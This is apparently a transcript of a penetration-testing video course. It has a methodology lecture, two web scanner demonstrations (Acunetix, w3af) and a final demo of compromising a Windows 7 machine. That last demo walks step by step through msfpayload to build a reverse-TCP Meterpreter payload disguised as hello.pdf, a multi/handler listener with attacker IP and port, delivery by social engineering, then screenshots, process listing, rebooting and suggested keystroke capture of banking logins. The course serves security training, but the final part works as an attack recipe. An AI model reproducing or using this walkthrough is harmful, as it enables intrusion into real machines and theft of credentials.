Vulnerability assessment and penetration testing are two very important tasks in the current information security scenario, with intrusions of varying patterns taking place on a regular basis. A successor to vulnerability assessment, penetration testing involves placing the concerned target under various test conditions in order to evaluate the degree of effectiveness of the protective measures employed. The target in question could be anything from a standalone system to a web application to a complete network. It mainly involves testing the vulnerabilities found in the concerned target using various exploits which would compromise its security. Proper assessment is an essential precursor to a successful penetration test. As the whole process is a bit intrusive in terms of a system security, there might be a lot of potential issues that may arise in the course. It is important to understand and properly go along with the restrictions and regulations underlined by the authorities. As penetration testing is a highly intrusive process leading to actual security compromises, it is imperative that a penetration tester should be protected with a letter of authority, which would grant the tester explicit permission to perform tests on the concerned target. Before testing, encryption of the tester's own data is an important task to care for. Before testing, encryption of the tester's own data is an important task to take care of. There would be no liable entity if the penetration tester's own data is compromised during the test. Now, it is important for us to know why such processes are a requirement in information security nowadays. Understanding why a penetration test is important to the current security scenario of an organization goes a long way to secure controls for the various facets of the organization. A penetration test is used to determine the potential points of breach that could take place in a system, whether it is a web application or a network. It can be used to simulate real intrusions and observe the digital traces and patterns left by them, and formulate an appropriate response strategy. It can be used to justify the need for required system patches, increasing the budget, or to validate risk assessments. Now, like all properly defined processes in information security, penetration testing does not occur in a haphazard manner. It is a systematic process involving a series of steps in order to provide comprehensive results. These steps are reconnaissance or footprinting, scanning, exploiting or penetrating, maintaining access and data collection, cleaning up, and report preparation and submission. Based on the differing environments and parameters associated with diverse systems, penetration testing can be classified into three different types. In this slide, we will look into black box testing. It is also known as zero knowledge testing, wherein the tester has no prior knowledge of the target. The tester needs to perform information gathering techniques in order to understand the various aspects of the application in order to prepare a proper testing plan. The benefit is that black box testing is intended to simulate attacks from the perspective of someone who is unaware of the internal controls of the system. This method of testing gives an insight onto the attack mechanisms of actual attackers. White box testing is the opposite of black box testing, and it is also known as complete knowledge testing. Here, the penetration testers are given full information about the target system they are supposed to attack. This information includes technology overviews, data flow diagrams, code snippets, and access to developers and business leaders. This kind of testing obviously reveals more vulnerability and may be faster. White box testing also can be compared to replicate an attack from a criminal hacker that knows the company infrastructure very well. This hacker may be an employee of the company itself doing an internal attack. Contrary to common perceptions, those kinds of attack are most likely. It gives a more detailed and comprehensive result than black box testing. In this slide, we shall see grey box testing method. It is also known as partial knowledge testing, where the tester has an understanding of some of the internal controls of the system. Testers are given complete information about specific sections of the target, which would help them evaluate the relevant sections without compromising the security of the whole system. The benefits of grey box testing is that it is an amalgam of black box and white box testing, incorporating the best of each process, whereby reducing the risk of security compromise from the administrator's perspective. Moving on to the methodology into more detail, the first step is called footprinting. As we have seen in the earlier modules, it is an alias for information gathering. The type of information that is relevant for a penetration test is pretty specific, such as finding out IP addresses that are present in a network, or in case of a web application, crawling is done to find about all the URLs that are referred in it. Attention to detail is the key to get comprehensive results from this process, and every piece of information should be documented. For penetration testers, this helps to narrow down the scope of the penetration test by providing an idea of how the system is set up and the processes involved in it. The defenses against this process include setting up a network-based intrusion detection system. Now the next step in conducting a penetration test is scanning. It involves gathering information in a more detailed manner. Scanning extends the information gathering process by extrapolating the data collection mechanism to get detailed information such as which machine is up and what ports or services are open. It focuses on the potential entry points in a system. Since this process is an intrusive one, scanning tools tend to reduce packet frequency and introduce randomization to reduce the chances of detection. It is important for the tester to account for the consideration of various scenarios in this process in order to eliminate false positives and gather more accurate information. The previous couple of slides are important from a tester's perspective in the sense that it helps them create a comprehensive test plan in order to proceed. Now the next step in the process is gaining access. This stage is important for the tester to put in practice all the hypothetical scenarios conjured up with the data gathered from footprinting and scanning. Based on the information gathered so far, the tester makes an informed attempt to access the target in order to breach through its defenses and gain access. Some of the common techniques attackers use to gain access are eavesdropping, password grabbing, file sharing, and in most cases, buffer overflow weaknesses. Some of the commonly used tools in this process are SSL dump, Wireshark, and Metasploit. After gaining access, an attacker tends to maintain access through a variety of methods. So for the tester to simulate the process, it is imperative that the same methods be employed in order to give the penetration test an aura of authenticity. Through the previous stage, user level access is obtained by the tester, but now it is important to escalate privileges and get administrator access in order to get complete control of the system. For this process, multiple exploits are used along with process migration and password cracking. Some of the commonly used tools here are John the Ripper, Lofttrack, GetAdmin, and so on. Once the whole process is completed, the tester has to take into account the attacker's attempt to delete all traces of the intrusion and enact the same process in order to complete the penetration test. Once total ownership of the target is secured, hiding this fact from the system administrators become paramount. Clearing logs and hiding tools are the most common techniques employed in this step. Creating backdoors is an essential part of getting persistent access into the system. Trapdoors are laid in various parts of the system to ensure that privileged access is easily regained whenever the intruder decides. Some common techniques include creating rogue accounts, scheduling batch jobs, infecting startup files, planting remote control services, installing monitoring mechanisms, or replacing applications with Trojans. Since these techniques are mostly used by intruders for malicious purposes, from the tester's perspective, it would be a good benchmark to assess the security measures of a system. Now, vulnerability assessment is a subset of vulnerability management and deals with the process of finding out vulnerabilities in the system which could lead to potential compromises. Apart from finding out vulnerabilities, classification of such entities is a very important task handled by this process. Vulnerability assessment is mainly classified into two types, namely proactive and reactive assessment. A comprehensive vulnerability assessment is the cornerstone of a good penetration test as it reduces a lot of effort and time, while increasing the accuracy of the testing scenarios and thereby increasing the chances of a successful test procedure. It is important for us to understand the need for vulnerability assessment. In the current information security scenario, vulnerability assessment is the most important of all the security processes employed. Some of the tangible effects of such process are system accreditation, risk assessment, network auditing, guidance for security controls, assessing the efficiency of expenditure on resources, providing a greater insight into the overall organizational controls, and compliance checking. Apart from that, continuous monitoring as well. As we approach the end of this module, we shall get an outlook on the steps that should be performed for a proper assessment case. First of all, setting up the prerequisites for the assessment process is essential, such as initiation of the documentation, securing authorization for the process, and updating and configuring the tools. The next step would be to test the execution process in which the tools are employed with proper documentation for each phase, and running a packet capture while employing the assessment tools. The next step would be to dive into the vulnerability analysis process. It consists of the following steps. First, assessing risk presented by vulnerabilities. Secondly, comparing the results to security policy. Third, verifying vulnerabilities. Fourth would be prioritizing vulnerabilities. Fifth and the last point would be researching vulnerabilities. One important aspect of vulnerability assessment is to look up error types in great details. Error prevention can be done by using several different tools for verification, examining the traffic generated by the tools, and consulting with the system owner or administrator. The fourth step would be to create a report which present a meaningful summary of the vulnerabilities found, prioritized, and explained. Also, the summary provides possible remediation suggestions. Without proper remediation advice, a vulnerability assessment process remains incomplete, and hence the final step is to employ remediation measures in order to address those issues. The actions consist of two types, automatic and manual remediation, which have their own shares of pros and cons. It is recommended that a mix of both techniques should be employed. So that is all for the vulnerability assessment and penetration testing process. Next are some demonstrations which shall illustrate the aforementioned processes. Thank you.
Hi, today I'm going to show you a practical demonstration of how to conduct a vulnerability assessment for a web application. So I'm going to show you a practical demonstration of how to use a tool called Equinetics for conducting a vulnerability assessment for a web application. So this is the vulnerability assessment tool called Equinetics. With the help of this tool, we can conduct a vulnerability assessment on any website. You can see this is the first interface of the, once I'll click on the Equinetics icon, this is the first interface that I can get onto my screen. So on the left side, I can see there are different sections. The one which I'm interested in more is the web scanner. Once you click on the web scanner, you can see onto your screen that there is a section called Start URL, where you can put the name of any website like xyz.com or yahoo.com or google.com, so forth. On the right hand side, you can see there is a drop down menu in which you can choose a different web application attack vectors, like for an example CSRF, directory traversal attack, or file upload, or Google hacking database, SQL injection, so forth. So like suppose if I wanted to figure out the specific website is vulnerable to cross-site scripting attack, then I can choose this one, XSS attack vector, and I can put the URL here and start the scanning. Or like suppose if I wanted to see whether the website is vulnerable to CSRF, that is cross-site request forgery attack, so I can choose CSRF, and here I can put the URL of the website and start the scan. On an average, what I can do is I put this drop down menu onto a default mode, by which it can scan on an average all the attack vectors and show me the result. So let's suppose I can put a website here and start with the scanning. So now the Equinetics got started. Once it started, on the right hand side it will show you a really nice diagram where it can categorize the vulnerability in different sections, that is high level, medium level, low level information. The one which I am more interested in is the high level vulnerabilities, because these are the vulnerabilities which can cause a great impact to the website. So by accessing the vulnerability, I can assess what are the different attack vectors can possibly be run on the website, or a website is vulnerable to these specific attack vectors. So if you can drop it down, you can see there is a quite a big list of different web pages out there. So the more I'm interested in, like you can see, you can just click onto any drop down menu, you can just click onto any plus sign and just check out and click. Under this there is a web server, like for an example Apache HTTP remote denial of service attack is there. You can click on web server, and on the right hand side you can see the detail of the attack. So for an example, like in this case, this website is running a lower version of web server, which is not actually a good practice. So this website might be vulnerable to a web denial of web application, or remote denial of service attack. So now here's another, like if I can see that password type input with autocomplete enabled, so you can just click onto this section and you can see like on the right hand side there is a detail about the complete attack. So like you can see whether the specific attack is how much it's going to impact onto my website. So here, like this wise, you can access the complete assessment of your website or your web portal. So this will take a couple of more minutes, like it will scan through the whole website and will show you the what actually the website is consisting of, whether the website is vulnerable to how many types of different attack vectors or not. If you click onto the target information, you can see like the web server of the website, on which web server is running. Like right now onto my screen, it's running on Apache 2.06 and it's based on Unix, and operating system is again Unix. A web server name is Apache, that is the 2.x, that is the 2 version. Then here you can see the statistics of the website. If you click on more, then again you can see the progress bar is here. So likewise, you can do a great vulnerability assessment for your web application. For an example, if I wanted to conduct more tests, so I can stop this test from here, or I can pause it in between, like, and here I can move. So like suppose I wanted to stop this test, I just click on stop, and now it's asking me are you sure you wanted to stop all scans? I'll say yes. Once I'm done with this, yeah, so my scan is stopped now. So now what I can do, the best part of using this type of vulnerability scanners, what I can do, like for suppose if I'm working for a company, or like if I'm a student and wanted to create a project for my internship, so I wanted to like create a complete report onto this. So what is the best part of this type of vulnerability scanner, or what is the best part of Acunetics, is that here you can see an icon that is called report. So you can just put your icon here and it will show you the generate a report. You just click onto it, and what the best part is, it will create a report for you, a complete report. Now you can see the website that I have just scanned. Now it'll give me a complete information about the different attack vectors. He just figured it out in a really detailed manner. So this is the complete PDF format of the report. So what you can do is just to present it to your senior management level, like your CSO and CXOs, or if you are a student, then you can create a really nice report onto your project that is like comes under your penetration testing part or your vulnerability assessment part. Yeah, this is really nice. So you can use it for your any purpose. Yeah. So this is about Acunetics. So if you wanted to dig deeper down into it, you can check out more tutorials onto our website about the Acunetics part. You can read more tutorials, you can read the documentation parts. The Acunetics that I'm using, that is the version 8, that is the latest one. So this is, again, I'm telling you, this is not the free version software. You can run it in a trial mode, or you can download it from any other channel if you wanted to use it for free, which is I am not suggesting you to do. So yeah, so this is about Acunetics. So in this manner, this is really easy. In this manner, you can scan your whole website and figure it out, like whether your website is vulnerable to hacking or cracking or different attack vectors or not. So in this way, when you assess the vulnerability, you can secure your website. You can, once you're able to figure out whether your website is vulnerable to different attack vectors, then later on you can patch it. So this is the most important part. Before conducting any penetration test, we'll just need to conduct a vulnerability assessment. So once we're done with the vulnerability assessment, we'll able to figure out that what are the different possible attack vectors that can be possibly able to run into our website. So we just saw how to conduct a penetration vulnerability assessment on a Windows platform. So like suppose if you are a fan of open source softwares and you wanted to conduct a vulnerability assessment with the use of an open source application on our software. So in that scenario, what you can do is just you can use an open source software, that is Weave, that is Web Application Attack and Audit Framework, for conducting any vulnerability assessment on any web application. So here right now I'm using a Backtrack distro, and I just need to go to my application part, and in application part what I can see is there's a Kali, and there you need to go to exploitation tools, then you need to go to your web application, and then you need to go to the vulnerability assessment scanner, and here you can figure out, here there is Weave. You just click onto this, or you can just create an icon like this, what I just created onto my desktop, like Weave. Here it is. And once you click onto the icon, you will see like it's just opening up. Take a little time. Yeah, here is Weave. It's Web Application Attack and Audit Framework. It's a complete open source software, so you do not need to pay a single penny to use it. So for all those people out there who are a great fan of open source web application, they can use it for. It's really nice and simple intuitive interface which helps you to conduct a really nice vulnerability assessment onto your website. So here you can see this is have different sections, like here is the target, here where you can put the name of any website you wanted to conduct a vulnerability assessment. Any website, like as I told you in previous video, like xyz.com or yahoo.com or google.com. Here what you can do is choose OWASP top 10, that is your Open Web Application Security Project top 10 attack vectors that are like figured out by OWASP every alternate years, or after 2 years or 3 years. They have conduct assessment around the world on different web application, like what are the most critical web application attack vectors are vulnerable to, and then they categorize into top 10 category. So yeah, so if I wanted to scan my website, or if I wanted to conduct assessment on a web application based on OWASP top 10, so what I can do is on the left hand side of the pane I can choose this OWASP top 10. Here if I'll see onto the other hand side, there is like different sections like audit, authorization, brute force discovery, evasion, grep, and bangle. So some of the things which you are not familiar with, so what I suggest you to don't do it and touch it. Just put it onto a default mode, or what you can do is just check it or uncheck it like this. If you check it, so this is what you are going to do it, and just check it or uncheck it. Yeah, so as I told you, if you are not familiar with any of these things, so don't play with it. Just put it onto a default mode, and here just what you need to do is just put the name of the website. Like suppose I'm just putting here the name of a website, so here I just put the website, and on the right hand side you can see a start icon. So once you click on start icon, it will start the vulnerability assessment of your website. So let's start with it. Yeah, so just click onto your start icon. I just put in the name of the website on the target section and just start. Yeah, so once I started the vulnerability assessment on Weave, it will start scanning the whole website. It will take a couple of minutes or maybe more than that. And here you can see different tabs like logs, results, and exploits. So in logs I can see the different logs that you're going to create, and that is the current scanning which is going to take place or happening onto my website. And here I can see the results. In results I have again different sections like KB browser, URL, and request response navigator. So what I can do is just once the scanning has got started, I can go to the results section and I can see what are the different vulnerabilities and information that got just fetch it out from my website, and on which different attack vectors my web application is vulnerable to, and I can see what are the different web application attack vectors are running right on my website, whether my website is vulnerable to cross-site scripting attack, or whether my website is vulnerable to cross-site request forgery attack, or whether my web application vector to directed traversal attack, or so forth. So now when you can see onto your screen, it just started, and there you can see a really nice timeline onto your screen, and it just started the scanning of my website. And here in the results section, if you click onto the results section, you can see like there are different subcategories, or there's an icon. You can click onto it, it'll give you a drop down menu, and here then again you can click onto it again, another drop down menu. If you click onto this section on the right hand side, you can see a detailed overview of the which specific attack or the thing that he figured it out. You can see the response header as well on in the lower part of the right hand side in a box. So in this pane you can see whether your website is vulnerable to different attack vectors or not. Here you can see the information about your website. If you click onto the exploit part, here you can see the different exploitation. So for now you're not able to figure out anything. So in this way you can see, so once the scan is completed, you can see the complete result in the result tab, and you'll be able to figure out whether your website is vulnerable to any specific hacking or cracking technique, hacking or cracking attack vector or not, whether your website is vulnerable to any specific web application attack vector or not. So in this way you can access the security of your website. This is the best part you can do with Weave. So the best part is that this is open source and you do not need to pay to use it. So this is about Weave, and this is the way you can do the assessment of your website. So I'm going to stop it now. Yeah, so just stopped it. I just stopped it, and yeah, so this is about vulnerability assessment. Thank you.
Hi, today I'm going to show you a practical demonstration of penetration testing. In this video I'm going to show you how to compromise a Windows based machine with a simple exploit. It's an application based exploit in which we can create an exploit in any application like PDF, doc or exe. Here I'm going to use a PDF based exploit. So once I created my exploit, then what I need to do, I need to simply send that exploit to my victim, and once the victim execute that file, its system got compromised. Here I'm going to use as an attacking machine, it's my Kali Linux. It's another updated version of Backtrack machine, and as a victim I'm using a Windows 7 machine. So here I'm using a Windows 7 Home Premium version, and I'm going to compromise this machine, and let's see what will happen then. So first of all, what I need to create a payload, that is an application based payload that I'm going to execute onto my victim. So let's first of all create a payload. So for that I am just simply going to use a simple command through which I can create a payload. So here's a simple command. What actually this command will do, MSF payload, it's a pre-built inbuilt utility in a Metasploit framework. For those of you who are not familiar with Metasploit framework, it's a really enriched framework for penetration testing and hacking and cracking and exploit development also. So in MSF payload, what I'm going to do is just create a payload which I'm going to bind with an application. So MSF payload with the following command, Windows meterpreter reverse TCP, which is going to connect me back to the to my machine, that is the attacker machine, and the L host, it means this is my IP address. So my machine IP address is 192.168.0.31. To confirm that whether I'm using the same IP or not, just type in the terminal ifconfig command. So make sure that you are using the same IP. So here is my IP address is 192.168.0.31. Now I need to assign a port so that once I'm listening onto my machine, through which port I am going to connect back. So I'm using the same port, that is 4321, and X, it's another command which is going to put all those credentials, all this payload into a file format or application. So here I'm going to use a hello.pdf file, and this will be going to create into my root directory. Make sure that you will going to collect this file from your root directory. For those of you who are not aware about where the root directory of Linux is lies, it's in your home folder. It's like you need to go to places, then click on to home folder, and here you can check out your root directory. Yeah, here it is. It's your root directory, so it's in home. So let's create a application based payload, which is I'm going to use as a weapon against my victim. So just hit enter on your terminal. It will take a couple of seconds to generate a payload. Yeah, so my payload is got generated. Now what I need to do is to just simply navigate to my home directory, and I can find here is the PDF file. So what I need to do is just simply need to port this or export this PDF file onto my victim machine. through with the help of social engineering skills or anything else. You just need to convince your victim so that once he will execute this payload onto his machine got infected and you can take the control of the machine. So here I'm going to use a simple application based PDF based exploit with the help of Metasploit framework, and I'm going to send this payload or this exploit to the victim. So once I transfer this to my victim machine, that is the same payload, I just rename it, it's the same one that I have just created, it's hello.pdf. fine, so I just created earlier for you guys. So what I need to do is just simply execute this payload onto this victim machine. This is my victim's computer, so I just need to make sure that whether and which IP address I'm working on right now. What the thing is, like, you do not need actually the IP address of the victim, but you just need to make sure that the victim runs that payload. So what we are going to do on the other hand side, the attacker side, we just need to open the Metasploit framework and need to check the rest of the settings, so that how we're gonna connect to the attacker machine. This will gonna take a couple of minutes, couple of seconds to load. So in this demonstration, I'm going to show you how to compromise a Windows based platform machine, and my machine is Windows 7. So here I'm into Metasploit framework. You can just simply type in the version command to check whether you're running the updated version of the framework, fine, or you can update it from the etc directory with the help of msf update command. So if you're not running the updated version, it's okay, fine, we'll still able to hack into that Windows 7 machine. So now what I need to do, I need to just use a multi-handler, so that once I able to the victim able to like execute an application onto his machine, how I'm going to listen that connection, I'm going to catch that connection onto the attacker machine. So what I'm actually doing is I just created an exploit, fine, and I just give it to the victim. With the help of social engineering skills, the victim going to execute that exploit onto his machine. Once the victim execute that exploit onto his machine, on the attacker side, which is I am in my machine, that is Kali Backtrack Linux, I'm running a handler that is which is listening onto some specific port, onto some specific IP address. The moment I got the connection, it catches that connection and give me a throw me back a shell, that is my interpreter shell, that's again a Linux shell. And once I got the shell, I can do whatever the commands which I can perform, or whatever, if I wanted to copy some data from the victim machine, if I can take the screenshot of the machine, want to see the processes of the machine. So let's see how I'm going to approach this task. I'm going to execute the whole thing. So let's first of all run the handler. So use exploit multi /HAND handler and hit enter. Now what you need to do, you need to set a payload for that. That is set, I'm going to use a Windows interpreter payload. This is my payload. So set payload is the command in Metasploit framework to set a payload. So my payload is Windows interpreter reverse TCP. What will this do? It will connect me back to my machine with the interpreter shell. Fine, it's again a Linux shell. So just hit enter. Now my payload is got set. Now what you need to do, you just need to type in command, that is show options. Yeah, so in this section I need to fill some things like L host, that is my listening host, and L port, that is again my listening port. So by default it shows like 4444, but I'm going to change it now. So I'm going to fill it like L host, and L host is my IP address. It's the attacker's IP address. So my IP address is 192.168.0.31, and the port I have just used L port is 4321. So make sure that you have filled these things correctly. If you have not done that correctly, you will end up with nothing. Fine. So the L host, the port, the IP address which you need to fill into this is the attacker's IP address, and the port which you have just choose, you can choose any port. There are like 65,535 ports available. What I recommend you to use the port which are not reserved port, like 555, 444, 4321, 3321, anyone, fine. So here I'm going to use 4321. That's, it's easy to remember for me, nothing specific. Now check again with the show option command and see whether the respective things got filled up or not. Yeah, so now it shows L host, it's mean listening host, which is the attacker machine, is 192.168.0.31, and the L port is 4321. Yeah, so now I'm on to the final stage. What I need to do is just to run a command, that is exploit, to exploit the victim machine. But before that, let's see what the victim needs to do before. So make sure that we have just run it. So just start and type in here exploit, and now the starting the payload handler, it started the payload handler on the attacker's machine. Like suppose now if in a scenario a victim runs this PDF exploit, what will happen? Just double click on this exploit. Yeah, it says accept the connection. Now okay, and yeah, this is what it is actually, and simply close it. Now see on the attacker's machine, what is anything happen here? Takes a couple of seconds. Okay, fine. So let's see what will happen if I run this hello.pdf on victim machine. Okay, I have just successfully executed this file onto the victim machine. So let's see on the other end side of the attacker machine what will it shows. Yeah, voila, I connected to the victim machine. Now here I have got the console from the victim machine and I can do whatever I want. So let's first of all check the victim's IP address. Just type in command shell, and yeah, I'm inside the command prompt of the victim. Then type in ipconfig, and yeah, I have all the details about the victim machine. I just can simply type in exit, and I can check what are the different processes running onto the victim machines with the command of ps, and just hit enter. Now you can see these are the different processes which is running onto the victim machine, that is like services.exe, TP, SVC host, task manager. So I can kill any of the process at any point of time. I can make the machine restart. So if you wanted to check there are more commands about the Mitraptr shell, you just need to simply type in help onto the console and it will show you what are the different commands Mitraptr support. So one of the interesting command is that you can even keystroke, even you can capture the keystroke of the victim machine. Like suppose victim is logged into Facebook account or a Gmail account, if it type in into any of the payment gateway or the banking gateway, so you can then capture the whole keystroke of the victim machine and you can get those keystrokes. Again, the best part is if you wanted to take a screenshot of the victim machine, so there is a really simple and nice command about that, that is screenshot. It just you just see right onto this on your screens, that is like screenshot. You just need to type in, just what it will do, it just grab a screenshot of the interactive desktop. So let's try this command screenshot and see whether we are able to get the victim screenshot or not, victim's desktop screenshot or not. Yeah, so your screenshot is got stored into your root directory. As I told you, the root directory is the home directory of the Linux machine, so you just need to simply navigate to the home directory. Yeah, so here is the picture. You just need to right click onto it and open it. Yeah, beautiful. So I have got the victims computers or desktop screen computer screenshot. So here I can take anything, or I can see what are the different programs and files open right on the screen. If we log it into with Facebook account or its Gmail account, so I can see its email ID. There are many things that I can compromise onto the victim machine. So with this thing, there are many things that you can do. There are like you can restart the victim machine. So the simple command is you just need to type in restart and the machine's got restarted. So once you are done with each and everything, you can play with the victim's machine computer, or at the end you can just make the machine restart. So there are different commands you can see onto your screen that you can run this under Mitraptr shell, and it's really interesting to do it. It's apart from fun, it's a really serious issue. So this is the simple video about how you can penetration test any Windows based platform. This attack can work on Windows 7, Windows XP, or even you can try it on Windows 8 platform as well. So let's check out some more commands. Let's try to restart the victim machine. So the command is simple. You need to restart. Okay, Okay, so now let's try to reboot the victim machine. So just type in command reboot and see whatever we are able to get it or not. Yeah. And you see on the other inside, yeah, you can see on this thing. So try to cancel it. Okay, there is an application is running. Now again we try to give a command again, that is the reboot, and see whether the victim machine, yeah, well, it's got restarted, it's shutting down now. So this is really interesting and you can play with the machine. So in this is the video about like how you can penetration test into a Windows based machine. I have just shown you a video how you can, like, the session is died, it just showed onto my screen. Now the victim again need to execute the code. So make sure that once you are done with each and everything, then only you make the machine reboot, or then only you pass that reboot command onto the screen, onto the victim's machine. So in this way you can do penetration testing on any Windows based platform, as I told you, in Windows XP, or you can give it a try on Windows 8 environment also. So yeah, this is about penetration testing. Thank you.